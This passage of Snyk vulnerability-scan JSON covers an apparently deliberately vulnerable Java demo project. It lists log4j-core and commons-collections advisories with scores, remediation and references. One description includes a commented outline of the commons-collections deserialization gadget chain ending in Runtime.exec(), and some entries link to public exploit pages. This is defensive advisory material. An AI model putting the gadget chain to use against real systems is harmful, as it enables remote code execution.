downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.3, 2.17.0 or higher.\n## References\n- [Apache Security](https://logging.apache.org/log4j/2.x/security.html)\n- [JIRA Issue](https://issues.apache.org/jira/browse/LOG4J2-3230)\n", - "epssDetails": { - "percentile": "0.99624", - "probability": "0.96524", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-45105" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.apache.logging.log4j:log4j-core", - "proprietary": false, - "creationTime": "2021-12-17T18:23:58.542986Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-12-17T18:20:21Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.logging.log4j", - "artifactId": "log4j-core" - }, - "publicationTime": "2021-12-18T07:05:00Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:58.516498Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.snyk:log4shell-client@0.0.1-SNAPSHOT", - "org.apache.logging.log4j:log4j-core@2.14.1" - ], - "upgradePath": [ - false, - "org.apache.logging.log4j:log4j-core@2.17.0" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.logging.log4j:log4j-core", - "version": "2.14.1" - }, - { - "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", - "title": "Arbitrary Code Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0-beta7,2.3.2)", - "[2.4,2.12.4)", - "[2.13.0,2.17.1)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.3.2", - "2.12.4", - 
"2.17.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.6, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.logging.log4j:log4j-core", - "references": [ - { - "url": "https://logging.apache.org/log4j/2.x/security.html", - "title": "Apache Security Page" - }, - { - "url": "https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/LOG4J2-3293", - "title": "Jira Issue" - }, - { - "url": "https://www.openwall.com/lists/oss-security/2021/12/28/1", - "title": "Openwall Mail" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 6.6, - "modificationTime": "2024-03-11T09:48:51.766965Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 6.6, - "modificationTime": "2024-03-11T09:53:58.472982Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:47.220633Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:51.766965Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:58.472982Z" - } - ], - "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging 
library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution.
**Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n## Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n## References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n", - "epssDetails": { - "percentile": "0.89602", - "probability": "0.02239", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-44832" - ], - "CWE": [ - "CWE-94" - ] - }, - "packageName": "org.apache.logging.log4j:log4j-core", - "proprietary": false, - "creationTime": "2021-12-28T19:42:55.818691Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-12-28T19:42:53Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", 
- "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.logging.log4j", - "artifactId": "log4j-core" - }, - "publicationTime": "2021-12-28T20:17:52Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:58.472982Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.snyk:log4shell-client@0.0.1-SNAPSHOT", - "org.apache.logging.log4j:log4j-core@2.14.1" - ], - "upgradePath": [ - false, - "org.apache.logging.log4j:log4j-core@2.17.1" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.logging.log4j:log4j-core", - "version": "2.14.1" - } - ], - "ok": false, - "dependencyCount": 2, - "org": "austin.doll", - "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", - "isPrivate": true, - "licensesPolicy": { - "severities": {}, - "orgLicenseRules": { - "AGPL-1.0": { - "licenseType": "AGPL-1.0", - "severity": "high", - "instructions": "" - }, - "AGPL-3.0": { - "licenseType": "AGPL-3.0", - "severity": "high", - "instructions": "" - }, - "Artistic-1.0": { - "licenseType": "Artistic-1.0", - "severity": "medium", - "instructions": "" - }, - "Artistic-2.0": { - "licenseType": "Artistic-2.0", - "severity": "medium", - "instructions": "" - }, - "CDDL-1.0": { - "licenseType": "CDDL-1.0", - "severity": "medium", - "instructions": "" - }, - "CPOL-1.02": { - "licenseType": "CPOL-1.02", - "severity": "high", - "instructions": "" - }, - "EPL-1.0": { - "licenseType": "EPL-1.0", - "severity": "medium", - "instructions": "" - }, - "GPL-2.0": { - "licenseType": "GPL-2.0", - "severity": "high", - "instructions": "" - }, - "GPL-3.0": { - "licenseType": "GPL-3.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.0": { - "licenseType": "LGPL-2.0", - "severity": "medium", - "instructions": "" - }, - "LGPL-3.0": { - "licenseType": "LGPL-3.0", - "severity": "medium", - "instructions": "" 
- }, - "MPL-1.1": { - "licenseType": "MPL-1.1", - "severity": "medium", - "instructions": "" - }, - "MPL-2.0": { - "licenseType": "MPL-2.0", - "severity": "medium", - "instructions": "" - }, - "MS-RL": { - "licenseType": "MS-RL", - "severity": "medium", - "instructions": "" - }, - "SimPL-2.0": { - "licenseType": "SimPL-2.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.1": { - "licenseType": "LGPL-2.1", - "severity": "medium", - "instructions": "" - } - } - }, - "packageManager": "maven", - "ignoreSettings": { - "adminOnly": false, - "reasonRequired": true, - "disregardFilesystemIgnores": false - }, - "summary": "4 vulnerable dependency paths", - "remediation": { - "unresolved": [], - "upgrade": { - "org.apache.logging.log4j:log4j-core@2.14.1": { - "upgradeTo": "org.apache.logging.log4j:log4j-core@2.17.1", - "upgrades": [ - "org.apache.logging.log4j:log4j-core@2.14.1", - "org.apache.logging.log4j:log4j-core@2.14.1", - "org.apache.logging.log4j:log4j-core@2.14.1", - "org.apache.logging.log4j:log4j-core@2.14.1" - ], - "vulns": [ - "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", - "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", - "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014", - "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720" - ] - } - }, - "patch": {}, - "ignore": {}, - "pin": {} - }, - "filesystemPolicy": false, - "filtered": { - "ignore": [], - "patch": [] - }, - "uniqueCount": 4, - "projectName": "io.snyk:log4shell-client", - "foundProjectCount": 7, - "displayTargetFile": "log4shell-goof/log4shell-client/pom.xml", - "hasUnknownVersions": false, - "path": "/Users/austindoll/Documents/GitHub/java-goof" - }, - { - "vulnerabilities": [ - { - "id": "SNYK-JAVA-COMMONSCOLLECTIONS-30078", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[3.0,3.2.2)" - ] - }, - "exploit": "High", - "fixedIn": [ - "3.2.2" - ], - "patches": [], - "insights": { - 
"triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[3,3.2.2)" - ], - "functionId": { - "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", - "className": "InvokerTransformer", - "functionName": "transform" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-collections:commons-collections", - "references": [ - { - "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", - "title": "FoxGloveSecurity Blog" - }, - { - "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", - "title": "Jira Issue" - }, - { - "url": "https://github.com/ianxtianxt/CVE-2015-7501", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:46:27.924934Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:52:38.421377Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.078866Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:27.924934Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": 
"Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:38.421377Z" - } - ], - "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-4852](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-6056408)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n", - "epssDetails": { - "percentile": "0.88407", - "probability": "0.01844", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-7501" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "commons-collections:commons-collections", - "proprietary": false, - "creationTime": "2016-12-25T16:51:56Z", - "functions_new": [ - { - "version": [ - "[3,3.2.2)" - ], - "functionId": { - "className": "org.apache.commons.collections.functors.InvokerTransformer", - "functionName": "transform" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2015-11-06T16:51:56Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-collections", - "artifactId": "commons-collections" - }, - "publicationTime": "2015-11-06T16:51:56Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:52:38.421377Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - 
"commons-collections:commons-collections@3.1" - ], - "upgradePath": [ - false, - "commons-collections:commons-collections@3.2.2" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "commons-collections:commons-collections", - "version": "3.1" - }, - { - "id": "SNYK-JAVA-COMMONSCOLLECTIONS-472711", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,3.2.2)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "3.2.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.6, - "functions": [ - { - "version": [ - "[3.1, 3.22)", - "[,3.0-dev2)" - ], - "functionId": { - "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", - "className": "InvokerTransformer", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-collections:commons-collections", - "references": [ - { - "url": "https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/commons-collections/pull/18", - "title": "GitHub PR" - }, - { - "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", - "title": "Jira Ticket" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:52:35.761152Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:03:34.698666Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - 
"assigner": "NVD", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:35.761152Z" - } - ], - "description": "## Overview\n\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data.\nVersions of commons-collections prior to `3.2.2` do not prevent deserialization of the class `org.apache.commons.collections.functors.InvokerTransformer`. This could be leveraged by an attacker as a gadget within a vulnerable application which deserializes user input to execute arbitrary code. \r\n\r\nVersions of commons-collections from 3.2.2 onwards will throw an `UnsupportedOperationException` error when attempts are made to deserialize InvokerTransformer instances to prevent potential remote code execution exploits.\r\n\r\n*Note:* `org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4` we recommend moving to the new artifact if possible.\r\n\r\n## PoC \r\n\r\n```\r\n/*\r\n\tGadget chain:\r\n\t\tObjectInputStream.readObject()\r\n\t\t\tAnnotationInvocationHandler.readObject()\r\n\t\t\t\tMap(Proxy).entrySet()\r\n\t\t\t\t\tAnnotationInvocationHandler.invoke()\r\n\t\t\t\t\t\tLazyMap.get()\r\n\t\t\t\t\t\t\tChainedTransformer.transform()\r\n\t\t\t\t\t\t\t\tConstantTransformer.transform()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tClass.getMethod()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.getRuntime()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.exec()\r\n\tRequires:\r\n\t\tcommons-collections\r\n */\r\n```\n\n## 
Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n \r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\r\n\r\n \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\n \r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n \r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. 
Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n\r\n- Apache Blog\r\n\r\n \r\n\r\nThe vulnerability, also know as _Mad Gadget_\r\n\r\n> Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. 
The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.\r\n\r\n- Google\n\n\n## Remediation\n\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee)\n\n- [GitHub PR](https://github.com/apache/commons-collections/pull/18)\n\n- [Jira Ticket](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n", - "epssDetails": { - "percentile": "0.82603", - "probability": "0.00880", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-6420" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-6hgm-866r-3cjv" - ] - }, - "packageName": "commons-collections:commons-collections", - "proprietary": false, - "creationTime": "2019-10-10T18:31:03.943542Z", - "functions_new": [ - { - "version": [ - "[3.1, 3.22)", - "[,3.0-dev2)" - ], - "functionId": { - "className": "org.apache.commons.collections.functors.InvokerTransformer", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-10T00:00:00Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-collections", - "artifactId": "commons-collections" - }, - "publicationTime": "2020-02-24T00:00:00Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:52:35.761152Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "commons-collections:commons-collections@3.1" - ], - "upgradePath": [ - false, - "commons-collections:commons-collections@3.2.2" - ], - "isUpgradable": true, - "isPatchable": false, - "name": 
"commons-collections:commons-collections", - "version": "3.1" - }, - { - "id": "SNYK-JAVA-COMMONSCOLLECTIONS-6056408", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[3.0,3.2.2)" - ] - }, - "exploit": "High", - "fixedIn": [ - "3.2.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-collections:commons-collections", - "references": [ - { - "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", - "title": "FoxGloveSecurity Blog" - }, - { - "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", - "title": "Jira Issue" - }, - { - "url": "https://github.com/ianxtianxt/CVE-2015-7501", - "title": "PoC" - }, - { - "url": "https://www.exploit-db.com/exploits/46628", - "title": "Exploit DB" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:54:13.273677Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.088365Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": 
"critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:13.273677Z" - } - ], - "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-7501](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
